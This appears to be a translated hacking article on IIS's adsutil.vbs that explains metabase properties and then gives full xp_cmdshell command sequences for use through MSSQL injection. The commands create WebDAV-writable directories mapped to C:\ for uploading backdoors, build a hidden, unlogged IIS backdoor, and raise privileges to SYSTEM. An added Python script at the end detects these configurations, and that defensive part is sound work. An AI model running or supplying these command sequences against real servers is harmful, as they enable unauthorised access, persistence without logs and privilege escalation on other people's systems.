This article is published in the
For extended help, type: adsutil.vbs HELP. If you want more detail, run that command yourself; I will not paste it all here, so nobody can say I am padding for a page fee. Everyone can check for themselves. The text after "//" below is commentary I added; I trust it is self-explanatory.

The adsutil.vbs commands we use most are: GET, SET, ENUM, DELETE and CREATE. GET reads the value of a property on a metabase path. SET sets a property. ENUM also reads properties, but it dumps every property that is set on the path in one go, usually several screens' worth; it takes an optional /P switch, with which it lists only the child paths (the virtual directories) under that node and no properties. DELETE removes a virtual directory, and CREATE creates one. There are also START_SERVER, STOP_SERVER, PAUSE_SERVER and CONTINUE_SERVER, which start, stop, pause and resume a web site.

The properties of a virtual directory look roughly like the following (I list only the ones we are likely to use, otherwise it would get far too long). This is what I saw on my own machine with:

    cscript adsutil.vbs ENUM w3svc/1/root

KeyType: (STRING) "IIsWebVirtualDir" // node type; (STRING) means the property is a string
AppRoot: (STRING) "/LM/W3SVC/1/ROOT" // the directory's metabase path
AppFriendlyName: (STRING) "Default Application" // application name
AppIsolated: (INTEGER) 2 // integer; whether the application runs in-process (0) or out of process (1 = isolated, 2 = pooled)
HttpCustomHeaders: (1 items) "Powered By: www.wofeiwo.info" // custom HTTP response headers
HttpErrors: (42 items) // the pages returned for the various HTTP status codes; they can be customised, and I omit them here
DefaultDoc: (STRING) "default.htm,index.htm,default.asp,index.asp,default.php,index.php,default.aspx,index.aspx" // default document names for the directory
Path: (STRING) "D:\ftp" // the physical directory the virtual directory really maps to
AccessFlags: (INTEGER) 513 // a bitmask of the Access* flags below (1 = Read, 2 = Write, 4 = Execute, 16 = Source, 512 = Script); 513 = Read + Script. It is maintained automatically when the individual flags are set, so there is no need to set it directly
AccessExecute: (BOOLEAN) False // allow executables (ISAPI/CGI) to run from the directory
AccessSource: (BOOLEAN) False // script source access: lets WebDAV clients read and write the source of script files instead of executing them
AccessRead: (BOOLEAN) True // read permission
AccessWrite: (BOOLEAN) False // write permission
AccessScript: (BOOLEAN) True // allow scripts (ASP and so on) to run
AccessNoRemoteExecute: (BOOLEAN) False
AccessNoRemoteRead: (BOOLEAN) False
AccessNoRemoteWrite: (BOOLEAN) False
AccessNoRemoteScript: (BOOLEAN) False
AccessNoPhysicalDir: (BOOLEAN) False
ScriptMaps: (27 items) // application extension mappings
    ".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
    ".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
    ".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
    ................ // many more entries omitted
AspEnableParentPaths: (BOOLEAN) True
AppPoolId: (STRING) "DefaultAppPool" // application pool name
DontLog: (BOOLEAN) True // disable IIS logging for this directory
DirBrowseFlags: (INTEGER) -1073741762
EnableDirBrowsing: (BOOLEAN) True // whether directory listing is allowed
DirBrowseShowDate: (BOOLEAN) True // this and the following control what a directory listing shows; the names are plain English, so I will not say more
DirBrowseShowTime: (BOOLEAN) True
DirBrowseShowSize: (BOOLEAN) True
DirBrowseShowExtension: (BOOLEAN) True
DirBrowseShowLongDate: (BOOLEAN) True
EnableDefaultDoc: (BOOLEAN) True // whether the default document is served

Everyone can run the command above and study the output. All of these can be set with the SET command.
The syntax is:

    cscript adsutil.vbs SET w3svc/1/root/<directory name>/<property name> <value>

For example:

    cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1 // set the read permission of the virtual directory "wofeiwo" under the first web site to TRUE

or:

    cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path "c:\" // set the directory's mapped physical path to c:\

That is a simple example of the usage.

III. Using adsutil.vbs

(1) A new upload idea for MSSQL injection

In MSSQL injection you may run into this situation: you have sa privileges and can execute commands (xp_cmdshell, sp_OACreate, jobs and so on), but the server sits on an internal network behind a bastion host that only maps port 80 to it. 3389 is useless (you cannot reach the internal network), and every reverse-download trick (TFTP, FTP, wget, exe2bat and the like) fails. What then? Amanl's classic "Squeezing the last drop out of MSSQL" gives us a good idea: use the VBS scripts under %SystemDrive%\inetpub\AdminScripts to create a new virtual directory and set its mapped absolute path yourself. That sidesteps guessing the absolute path of the web root. You then get a shell by writing a database or temporary table into the virtual directory with BACKUP or sp_makewebtask (or simply by echoing a file there).

The idea is a good one. But anyone who has played with GetWebShell or the Little Bamboo tool knows how low the success rate of BACKUP or sp_makewebtask is, and echo is not worth discussing; it makes me want to swear just writing about it (special characters trip it up too). In fact we can improve on Amanl's idea: when we create the virtual directory, give it write permission as well, and add WebDAV access. Then we can upload any file directly through IIS, not just text files. Upload a reverse backdoor, run it through sa, and everything falls into place.
Let's do it right away:

    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs CREATE w3svc/1/root/wofeiwo "IIsWebVirtualDir"';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/Path "c:\"';--

Note that the special characters above must be encoded when sent through the injection point; alternatively, run the commands with NBSI2 or the little SQLCOMM tool. We have now created a virtual directory "wofeiwo" under the first web site, mapped to the root of C:.

I give it read and write permission, and, so that we can have a webshell, script execution permission as well:

    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/AccessWrite 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/AccessScript 1';--

At this point, readers of SuperHei's "Exploiting IIS write permission" may be thinking of hand-crafting an HTTP request to upload files. There is a simpler way:

    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/EnableDirBrowsing 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/AccessSource 1';--

This enables directory listing and script source access, which is what WebDAV needs. Now open IE, press Ctrl+O to bring up the "Open" dialog, type the URL of the virtual directory you just created, tick "Open as Web Folder" and click OK. See Figure 1. Ha! You will see all the folders, as in Figure 2. From here you can work with the files as in any normal folder, including Ctrl+C / Ctrl+V to copy them, so uploading and modifying files is easy. (One caveat: this relies on the WebDAV extension being enabled on the server. It is on by default in IIS 5.0, but in IIS 6.0 WebDAV is a Web Service Extension that is prohibited by default.)

(2) Going further, the same idea can be used to build an IIS backdoor. Come and see how I do it. (The method is the one introduced in "An almost perfect IIS backdoor", but I do the whole setup with adsutil.vbs, the tool Microsoft ships; look that article up yourselves.)

    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs CREATE w3svc/1/root/wofeiwo "IIsWebVirtualDir"';-- // create the directory "wofeiwo"
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs CREATE w3svc/1/root/wofeiwo/door "IIsWebVirtualDir"';-- // create the directory "door" under "wofeiwo"
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path "c:\"';-- // map "door" to the root of C:
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/AccessRead 1';-- // this and the following give "door" its permissions; see the notes on the earlier commands
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/AccessWrite 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/AccessScript 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/DontLog 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/EnableDirBrowsing 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/AccessSource 1';--
    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/AccessExecute 1';--

Some may ask: what is this? Isn't it the same as before? Ha ha. Look closely and you will notice that the first directory we created, "wofeiwo", never had its Path property set, so it is not mapped to any physical directory. This takes advantage of a quirk of IIS (present in IIS 5.0 and 6.0): a virtual directory with no Path property does not appear in IIS Manager, so it is effectively a hidden directory. The "door" directory beneath it is invisible too, because its parent cannot be reached in the console. But "door" does have a Path, so if we request http://ip/wofeiwo/door/ the result is a listing of the files under C:\. We can now write and read files in that directory, and move into the system32 directory as well.
Our backdoor is complete. (Note that I also granted AccessExecute here.) But what we execute still runs as the IUSR account, IIS's default guest-level user, and without higher privileges we will never be satisfied. So next we raise them. Adding the IUSR user to Administrators is the obvious route and I will not dwell on it; here are two other methods:

1. Set AppIsolated so that the application in this directory runs inside the IIS process, where it inherits IIS's SYSTEM privileges:

    exec master..xp_cmdshell 'cscript.exe %SystemDrive%\inetpub\AdminScripts\adsutil.vbs SET w3svc/1/root/wofeiwo/door/AppIsolated 0';--

(This works when the in-process host is inetinfo.exe running as LocalSystem, that is, on IIS 5.0 or on IIS 6.0 in IIS 5.0 isolation mode. In IIS 6.0 worker process isolation mode, the default, requests are served by w3wp.exe under the application pool identity, Network Service by default, and AppIsolated 0 does not change that.)

2. Add asp.dll, the ISAPI extension that handles ASP files, to IIS's list of privileged in-process DLLs (the InProcessIsapiApps metabase property), so that ASP pages run inside the process as well.
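The other side of this technique is finding it. Every property the backdoor sets (a parent node with no Path, a child mapped to a drive root, Write together with Source and Execute, DontLog, AppIsolated 0) is stored in the metabase even though IIS Manager hides the node, so a scan of the metabase file catches what the console does not. The following Python script is an added example, not part of the original article or of any Microsoft tool: it reads an IIS 6 MetaBase.xml (%SystemRoot%\system32\inetsrv\MetaBase.xml on a real server) and reports virtual directories showing those indicators. The metabase embedded in it is constructed by hand in the IIS 6 file shape, not taken from a real system; the flag bit values are the metabase's own. The notion of an "exposed" path (a drive root or the Windows directory) is this example's assumption and would be tuned per deployment.

```python
"""Scan an IIS 6 MetaBase.xml for virtual directories configured like the
hidden backdoor above: a node with no Path (not shown in IIS Manager),
a Path on a drive root or under the Windows directory, Write combined
with Source or Execute, DontLog, or AppIsolated 0.

Added example for this article, not the article's own tooling. The
metabase below is constructed by hand; it is not from a real server.
"""
import re
import xml.etree.ElementTree as ET

# Bit values of the Access* flags behind the integer AccessFlags that
# "adsutil.vbs ENUM" prints (513 = AccessRead + AccessScript).
ACCESS_BITS = {
    "AccessRead": 1,
    "AccessWrite": 2,
    "AccessExecute": 4,
    "AccessSource": 16,
    "AccessScript": 512,
}

# Assumption for this example: a drive root ("c:\", "c:") or anything under
# the Windows directory counts as an exposed mapping.
EXPOSED_PATH = re.compile(r"^[a-z]:\\?$|^[a-z]:\\windows(\\|$)", re.IGNORECASE)

# Constructed sample. IIS 6 stores each metabase node as an element named
# after its KeyType, with Location and the properties as attributes, and
# AccessFlags written as flag names joined by " | ". The last two nodes
# mirror the article's "wofeiwo" (no Path) and "wofeiwo/door" (mapped to C:\).
SAMPLE_METABASE = r"""<configuration xmlns="urn:microsoft-catalog:XML_Metabase_V64_0">
<MBProp>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT"
    AccessFlags="AccessRead | AccessScript"
    AppIsolated="2"
    AppPoolId="DefaultAppPool"
    Path="D:\ftp"
>
</IIsWebVirtualDir>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/scripts"
    AccessFlags="AccessRead | AccessExecute"
    Path="D:\ftp\cgi"
>
</IIsWebVirtualDir>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/wofeiwo"
>
</IIsWebVirtualDir>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/wofeiwo/door"
    AccessFlags="AccessRead | AccessWrite | AccessExecute | AccessScript | AccessSource"
    AppIsolated="0"
    DontLog="TRUE"
    EnableDirBrowsing="TRUE"
    Path="c:\"
>
</IIsWebVirtualDir>
</MBProp>
</configuration>
"""


def decode_access_flags(value):
    """Decode the integer AccessFlags that adsutil.vbs prints into flag names."""
    return {name for name, bit in ACCESS_BITS.items() if value & bit}


def parse_access_flags(value):
    """Accept MetaBase.xml's 'AccessRead | AccessWrite' form or the integer
    form from adsutil.vbs output, and return the set of flag names."""
    value = value.strip()
    if value.isdigit():
        return decode_access_flags(int(value))
    return {part.strip() for part in value.split("|") if part.strip()}


def scan_metabase(xml_text):
    """Return [(location, [reason, ...]), ...] for suspicious virtual directories."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        # Element names carry the default namespace; compare the local name only.
        if elem.tag.rsplit("}", 1)[-1] != "IIsWebVirtualDir":
            continue
        location = elem.get("Location", "?")
        path = elem.get("Path")
        flags = parse_access_flags(elem.get("AccessFlags", ""))
        reasons = []
        if path is None:
            reasons.append("no Path: the node is not shown in IIS Manager")
        elif EXPOSED_PATH.match(path):
            reasons.append("Path exposes a drive root or the Windows directory: " + path)
        if "AccessWrite" in flags and flags & {"AccessSource", "AccessExecute"}:
            reasons.append("Write together with Source/Execute: WebDAV can upload executable content")
        if elem.get("DontLog", "").upper() == "TRUE":
            reasons.append("DontLog=TRUE: requests to this directory are not logged")
        if elem.get("AppIsolated") == "0":
            reasons.append("AppIsolated=0: in-process, LocalSystem under IIS 5.0 isolation mode")
        if reasons:
            findings.append((location, reasons))
    return findings


if __name__ == "__main__":
    for location, reasons in scan_metabase(SAMPLE_METABASE):
        print(location)
        for reason in reasons:
            print("  - " + reason)
```

On the sample, the two "wofeiwo" nodes are reported and the legitimate root and scripts directories are not. On IIS 5.0 the metabase is a binary file rather than XML; there, feed the output of cscript adsutil.vbs ENUM /P w3svc/1/root and GET on each child into the same checks (parse_access_flags already accepts the integer AccessFlags that adsutil prints).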